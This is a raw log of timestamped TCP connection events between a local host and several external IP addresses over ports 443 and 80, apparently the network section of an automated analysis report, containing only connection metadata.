Mar 26, 2025 18:31:22.357116938 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.357136965 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.357188940 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.357204914 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.357253075 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.357922077 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.357980967 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.375790119 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.375847101 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.375874043 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.375894070 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.375926018 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.375946999 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.377814054 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.377859116 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.377898932 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.377966881 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.378009081 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.378010035 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.379575014 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.379620075 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.379653931 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.379669905 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.379700899 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.379722118 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.381325960 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.381369114 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.381393909 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.381407976 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.381434917 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.381453991 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.383462906 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.383506060 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.383529902 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.383543015 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.383572102 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.383589029 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.383600950 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.385839939 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.385891914 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.385931015 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.385946989 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.385977983 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.386647940 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.386701107 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.386723042 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.386740923 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.386797905 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.388411045 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.388453960 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.388492107 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.388505936 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.388531923 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.388549089 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.390350103 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.390392065 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.390419006 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.390433073 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.390461922 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.390484095 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.393213034 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.393265009 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.393292904 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.393347979 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.393383980 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.393408060 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.394042015 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.394139051 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.394153118 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.395488024 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.395529985 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.395548105 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.395562887 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.395589113 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.397269964 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.397309065 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.397347927 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.397361994 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.397391081 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.399851084 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.399889946 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.399910927 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.399928093 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.399956942 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.401592016 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.401632071 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.401665926 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.401681900 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.401710033 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.403352022 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.403390884 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.403410912 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.403426886 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.403455973 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.403455973 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.405098915 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.405138969 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.405160904 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.405178070 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.405208111 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.407702923 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.407742977 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.407772064 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.407788992 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.407815933 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.432581902 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.432625055 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.432667971 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.432739019 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.432789087 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.432842970 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.432895899 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.432913065 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.432966948 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.432980061 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.433058977 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.433106899 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.433415890 CET	49726	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.433448076 CET	443	49726	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.519248009 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.519316912 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.519390106 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.520019054 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.520037889 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.704844952 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.705122948 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.705166101 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.705437899 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.705451965 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.891073942 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.891237020 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.891364098 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.893064976 CET	49730	443	192.168.2.4	172.64.80.1
Mar 26, 2025 18:31:22.893093109 CET	443	49730	172.64.80.1	192.168.2.4
Mar 26, 2025 18:31:22.977876902 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:22.977932930 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:22.978094101 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:22.978241920 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:22.978260040 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.167819023 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.168102980 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.171360970 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.171387911 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.171915054 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.176038980 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.220276117 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.360413074 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.360565901 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.361295938 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361304998 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361345053 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.361368895 CET	443	49735	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.361413002 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361448050 CET	49735	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361449003 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361610889 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.361624956 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.539005995 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.539504051 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.539550066 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.539591074 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.539601088 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.747884989 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.748043060 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.748125076 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.815324068 CET	49736	443	192.168.2.4	35.190.80.1
Mar 26, 2025 18:31:23.815356970 CET	443	49736	35.190.80.1	192.168.2.4
Mar 26, 2025 18:31:23.828352928 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:24.136464119 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:24.446135044 CET	49671	443	192.168.2.4	204.79.197.203
Mar 26, 2025 18:31:24.738028049 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:25.371643066 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:25.659933090 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.660845995 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.660882950 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.687171936 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:25.751693964 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.752592087 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.752954006 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.752969980 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.753032923 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.753034115 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.753611088 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.755261898 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.755280972 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.755321026 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.761488914 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.845659971 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.854656935 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.856585026 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.856654882 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.856745005 CET	443	49709	131.253.33.254	192.168.2.4
Mar 26, 2025 18:31:25.856803894 CET	49709	443	192.168.2.4	131.253.33.254
Mar 26, 2025 18:31:25.861139059 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:25.861476898 CET	49739	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:25.861514091 CET	443	49739	204.79.197.222	192.168.2.4
Mar 26, 2025 18:31:25.861577988 CET	49739	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:25.861851931 CET	49739	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:25.861871958 CET	443	49739	204.79.197.222	192.168.2.4
Mar 26, 2025 18:31:25.948852062 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:26.038995981 CET	49740	80	192.168.2.4	142.250.80.67
Mar 26, 2025 18:31:26.123773098 CET	80	49740	142.250.80.67	192.168.2.4
Mar 26, 2025 18:31:26.123979092 CET	49740	80	192.168.2.4	142.250.80.67
Mar 26, 2025 18:31:26.124342918 CET	49740	80	192.168.2.4	142.250.80.67
Mar 26, 2025 18:31:26.154975891 CET	443	49739	204.79.197.222	192.168.2.4
Mar 26, 2025 18:31:26.155129910 CET	49739	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:26.164863110 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:26.210206032 CET	80	49740	142.250.80.67	192.168.2.4
Mar 26, 2025 18:31:26.210839033 CET	80	49740	142.250.80.67	192.168.2.4
Mar 26, 2025 18:31:26.220441103 CET	49740	80	192.168.2.4	142.250.80.67
Mar 26, 2025 18:31:26.290011883 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:26.307008982 CET	80	49740	142.250.80.67	192.168.2.4
Mar 26, 2025 18:31:26.350950003 CET	49740	80	192.168.2.4	142.250.80.67
Mar 26, 2025 18:31:26.765362024 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:27.493366003 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:27.977715015 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:28.043277979 CET	443	49720	142.250.64.68	192.168.2.4
Mar 26, 2025 18:31:28.043318987 CET	443	49720	142.250.64.68	192.168.2.4
Mar 26, 2025 18:31:28.043521881 CET	49720	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:31:28.350883961 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:29.899472952 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:29.912517071 CET	49720	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:31:29.912592888 CET	443	49720	142.250.64.68	192.168.2.4
Mar 26, 2025 18:31:30.384090900 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:31.155422926 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.155510902 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:31.155626059 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.155807018 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.155826092 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:31.342037916 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:31.342133999 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.343394995 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.343420029 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:31.343651056 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:31.343993902 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:31.384274006 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.122535944 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.122632027 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.122849941 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.123991013 CET	49743	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.124056101 CET	443	49743	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.215586901 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.215677023 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.215768099 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.215948105 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.215981007 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.397789955 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.397885084 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.398854971 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.398874044 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.399085045 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:32.399648905 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:32.444272041 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:33.165251970 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:33.213051081 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:33.213129997 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:33.213217974 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:33.214467049 CET	49744	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:33.214502096 CET	443	49744	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:34.053512096 CET	49671	443	192.168.2.4	204.79.197.203
Mar 26, 2025 18:31:34.699897051 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:35.195533037 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:31:39.628371000 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:39.628485918 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:39.628587008 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:39.628731966 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:39.628756046 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:39.806292057 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:39.806675911 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:39.806757927 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:39.806843042 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:39.806855917 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.686747074 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.686868906 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.687246084 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.689181089 CET	49745	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.689224005 CET	443	49745	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.696824074 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.696916103 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.697042942 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.697177887 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.697196960 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.877202034 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.877554893 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.877613068 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:40.877873898 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:40.877926111 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:41.661461115 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:41.661567926 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:41.663569927 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:41.663569927 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:41.966908932 CET	49746	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:31:41.966975927 CET	443	49746	104.21.95.206	192.168.2.4
Mar 26, 2025 18:31:42.773533106 CET	49678	443	192.168.2.4	20.189.173.27
Mar 26, 2025 18:31:44.306394100 CET	49681	80	192.168.2.4	2.17.190.73
Mar 26, 2025 18:31:44.804307938 CET	49680	443	192.168.2.4	204.79.197.222
Mar 26, 2025 18:32:05.069351912 CET	49724	443	192.168.2.4	193.84.85.178
Mar 26, 2025 18:32:05.069374084 CET	443	49724	193.84.85.178	192.168.2.4
Mar 26, 2025 18:32:07.092966080 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:07.093027115 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:07.093225002 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:07.093370914 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:07.093400955 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:07.274211884 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:07.274854898 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:07.274949074 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:07.274983883 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:07.274996996 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.207194090 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.207365036 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.207456112 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.208570957 CET	49748	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.208585024 CET	443	49748	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.217684984 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.217720985 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.217811108 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.217912912 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.217928886 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.400068998 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.400536060 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.400620937 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:08.400770903 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:08.400785923 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:09.206063986 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:09.206161022 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:09.206245899 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:09.207087994 CET	49749	443	192.168.2.4	104.21.95.206
Mar 26, 2025 18:32:09.207106113 CET	443	49749	104.21.95.206	192.168.2.4
Mar 26, 2025 18:32:17.837040901 CET	49753	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:32:17.837129116 CET	443	49753	142.250.64.68	192.168.2.4
Mar 26, 2025 18:32:17.837291002 CET	49753	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:32:17.837594032 CET	49753	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:32:17.837626934 CET	443	49753	142.250.64.68	192.168.2.4
Mar 26, 2025 18:32:18.018374920 CET	443	49753	142.250.64.68	192.168.2.4
Mar 26, 2025 18:32:18.018781900 CET	49753	443	192.168.2.4	142.250.64.68
Mar 26, 2025 18:32:18.018863916 CET	443	49753	142.250.64.68	192.168.2.4
Mar 26, 2025 18:32:20.056199074 CET	443	49724	193.84.85.178	192.168.2.4
Mar 26, 2025 18:32:20.056297064 CET	443	49724	193.84.85.178	192.168.2.4
Mar 26, 2025 18:32:20.056354046 CET	49724	443	192.168.2.4	193.84.85.178
Mar 26, 2025 18:32:21.909353971 CET	49724	443	192.168.2.4	193.84.85.178
